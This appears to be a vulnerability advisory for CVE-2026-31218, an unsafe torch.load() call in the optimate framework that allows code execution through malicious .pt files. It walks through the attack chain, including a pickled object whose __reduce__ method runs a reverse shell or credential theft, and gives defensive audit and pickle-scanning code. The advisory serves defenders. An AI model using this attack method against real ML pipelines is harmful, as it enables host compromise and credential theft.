CVE-2026-31218: optimate: unsafe torch.load() enables RCE via model file

AWAITING NVD
Published May 12, 2026
CISO Take

The optimate neural network optimization framework contains an insecure deserialization flaw where model state dictionaries are loaded using PyTorch's torch.load() without the weights_only=True safety parameter, enabling arbitrary Python code execution during model loading. This is a well-understood and extensively documented attack class in ML pipelines — crafting a malicious pickle-embedded .pt file requires no advanced skills, meaning the exploitation barrier is trivially low for any attacker who can supply a model file to your training infrastructure. No public exploit exists and the package is not in CISA KEV, but urgency extends beyond optimate itself: this CVE signals a pervasive pattern across ML codebases where insecure torch.load() usage is endemic. Audit all torch.load() calls in your codebase for missing weights_only=True, enforce cryptographic model provenance verification, and evaluate migrating to the safetensors format, which eliminates pickle-based deserialization entirely.

Sources: NVD, GitHub Advisory, ATLAS

Risk Assessment

Effective severity is Critical despite no assigned CVSS score — insecure deserialization yielding arbitrary code execution is among the highest-impact vulnerability classes. Exploitation complexity is low once an attacker can deliver a crafted .pt file to the target environment, which is realistic in collaborative ML workflows, shared model repositories, or any pipeline consuming artifacts from external sources. The narrow attack surface (specific to optimate users loading external models via --model) limits immediate blast radius, but the underlying pattern mirrors dozens of similar CVEs across ML tooling and warrants broad codebase audits beyond this single package.

Attack Kill Chain

Artifact Staging
Adversary crafts a malicious state_dict.pt file by serializing a Python object with a __reduce__ method that executes arbitrary code, embedding the payload using Python's pickle module.
AML.T0011.000
Delivery
Malicious .pt file is placed in a directory accessible to the victim via shared storage, model repository, or supply chain compromise; victim specifies this path using the --model argument.
AML.T0010.003
Code Execution
Victim runs neural_magic_training.py; torch.load() without weights_only=True passes the file to Python's pickle module, which instantiates the adversary's object and executes the embedded payload with training process privileges.
AML.T0018.002
Impact
Adversary achieves full code execution on the ML training host, enabling cloud credential theft, training data exfiltration, lateral movement to connected infrastructure, or persistent backdoor installation.
AML.T0112.001

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

Recommended Action

6 steps
  1. Immediate patch: In neural_magic_training.py and all torch.load() call sites, add weights_only=True to restrict deserialization to safe tensor data only.

  2. Broad codebase audit: Run 'grep -r "torch.load(" . | grep -v "weights_only=True"' across all ML projects to identify the same pattern elsewhere. Note that this one-liner only catches single-line calls; calls whose arguments span several lines, or that pass weights_only=False, need a separate review.

  3. Model provenance: Implement SHA-256 hash verification for all model files before loading; maintain a manifest of expected hashes for approved artifacts.

  4. Format migration: Evaluate migrating model storage to safetensors format, which does not use pickle and cannot execute arbitrary code during loading.

  5. Environment hardening: Ensure ML training processes run with least-privilege credentials and cannot reach external networks post-exploitation.

  6. Detection: Monitor for unexpected process spawning, outbound network connections, or file system writes during model loading operations.
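As an added example covering steps 1 and 2 (not code from the optimate project or this advisory), an AST-based audit that finds torch.load() calls not pinned to weights_only=True, including the multi-line and weights_only=False cases the grep one-liner misses. It assumes the plain `torch.load(...)` spelling; aliased imports and the sample source it scans are constructed for the demo.

```python
# Added example (not optimate's code): audit source for torch.load() calls that
# are not pinned to weights_only=True, using the AST so multi-line calls count.
import ast

# Constructed sample source to scan: three calls, only the first is safe.
SAMPLE_SOURCE = '''
import torch
sd = torch.load(path, map_location="cpu", weights_only=True)
sd = torch.load(
    path,
    map_location="cpu",
)
sd = torch.load(path, weights_only=False)
'''


def is_torch_load(call: ast.Call) -> bool:
    """True for the plain `torch.load(...)` spelling (aliases are out of scope)."""
    f = call.func
    return (isinstance(f, ast.Attribute) and f.attr == "load"
            and isinstance(f.value, ast.Name) and f.value.id == "torch")


def audit_torch_load(source: str) -> list[tuple[int, str]]:
    """Return (line, reason) for each torch.load() call not pinned to weights_only=True."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.Call) and is_torch_load(node)):
            continue
        kw = {k.arg: k.value for k in node.keywords}
        if "weights_only" not in kw:
            # Before PyTorch 2.6 the default was False, i.e. a full pickle load.
            findings.append((node.lineno, "weights_only not set"))
        elif not (isinstance(kw["weights_only"], ast.Constant)
                  and kw["weights_only"].value is True):
            findings.append((node.lineno, "weights_only is not the literal True"))
    return findings


if __name__ == "__main__":
    for line, reason in audit_torch_load(SAMPLE_SOURCE):
        print(f"line {line}: {reason}")
```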

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
Article 9 - Risk management system
ISO 42001
8.4 - AI system supply chain
NIST AI RMF
MANAGE 2.2 - Mechanisms are in place to inventory AI systems and their components
OWASP LLM Top 10
LLM03 - Supply Chain

Frequently Asked Questions

Is CVE-2026-31218 actively exploited?

No confirmed active exploitation of CVE-2026-31218 has been reported, but organizations should still patch proactively.

What systems are affected by CVE-2026-31218?

This vulnerability affects the following AI/ML architecture patterns: Training pipelines, Model optimization workflows, Model fine-tuning environments, CI/CD ML artifact pipelines, Collaborative model development environments.

What is the CVSS score for CVE-2026-31218?

No CVSS score has been assigned yet.

Technical Details

NVD Description

The _load_model() function in the neural_magic_training.py script of the optimate project in commit a6d302f912b481c94370811af6b11402f51d377f (2024-07-21) is vulnerable to insecure deserialization (CWE-502). When loading a model state dictionary from a state_dict.pt file via torch.load(), the function does not enable the weights_only=True security parameter. This allows the deserialization of arbitrary Python objects through the Pickle module. A remote attacker can exploit this by providing a maliciously crafted state_dict.pt file within a directory specified via the --model argument, leading to arbitrary code execution during the deserialization process on the victim's system.

Exploitation Scenario

An adversary targeting an organization's ML optimization infrastructure crafts a malicious state_dict.pt file by serializing a Python object whose __reduce__ method executes a reverse shell or credential harvesting command. The attacker uploads this file to a Hugging Face repository, S3 bucket, or shared NFS mount that the victim's training pipeline consumes. When a data scientist or automated CI/CD job runs neural_magic_training.py with --model pointing to the directory containing the malicious file, torch.load() — absent the weights_only safeguard — passes the pickle stream to Python's Pickle module, which instantiates the adversary's object and executes the embedded payload. The training process, often running with cloud IAM permissions scoped to access model stores and training data, then becomes a pivot point for credential theft, lateral movement to other services, or persistent backdoor installation in the ML environment.
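As an added example for the load step described above (not optimate's code, and not PyTorch's own weights_only checker), a pre-load scan that walks the pickle opcodes inside a .pt archive with pickletools and refuses any class reference not on an allowlist, without ever unpickling the stream. The allowlist, the archive layout (archive/data.pkl) and the sample files are constructed assumptions; the scan complements weights_only=True or safetensors rather than replacing them.

```python
# Added example (not optimate's code): walk the pickle opcodes inside a .pt archive
# before loading and refuse any global not on an allowlist; nothing is unpickled.
import io
import pickle
import pickletools
import zipfile
from fractions import Fraction

# Assumed allowlist for a plain state_dict (illustrative; not torch's own list).
ALLOWED_GLOBALS = {"collections OrderedDict", "torch._utils _rebuild_tensor_v2",
                   "torch FloatStorage"}


def disallowed_globals(pkl: bytes) -> list[str]:
    """Return every 'module name' reference in the stream that is not allowed."""
    bad, strings = [], []  # strings: recent str pushes, consumed by STACK_GLOBAL
    for op, arg, _ in pickletools.genops(pkl):
        if op.name in ("SHORT_BINUNICODE", "BINUNICODE"):
            strings.append(arg)
        elif op.name == "GLOBAL":          # protocol <= 3: arg is "module name"
            if arg not in ALLOWED_GLOBALS:
                bad.append(arg)
        elif op.name == "STACK_GLOBAL":    # protocol 4+: module and name on stack
            ref = " ".join(strings[-2:])
            if ref not in ALLOWED_GLOBALS:
                bad.append(ref)
    return bad


def scan_pt_archive(blob: bytes) -> list[str]:
    """Scan each .pkl member of a torch-style zip (e.g. archive/data.pkl)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for name in zf.namelist():
            if name.endswith(".pkl"):
                findings += [f"{name}: {g}" for g in disallowed_globals(zf.read(name))]
    return findings


def make_pt(obj, protocol: int = 2) -> bytes:
    """Constructed sample: a minimal zip laid out like torch.save() output."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("archive/data.pkl", pickle.dumps(obj, protocol=protocol))
    return buf.getvalue()


BENIGN = make_pt({"layer.weight": [0.1, 0.2]})              # plain containers only
SUSPECT = make_pt({"ratio": Fraction(1, 3)})                # harmless, but unlisted class
SUSPECT4 = make_pt({"ratio": Fraction(1, 3)}, protocol=4)  # same via STACK_GLOBAL
```

A file that produces any finding is rejected before torch.load() ever sees it; a clean scan still goes through weights_only=True.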

Timeline

Published
May 12, 2026
Last Modified
May 12, 2026
First Seen
May 12, 2026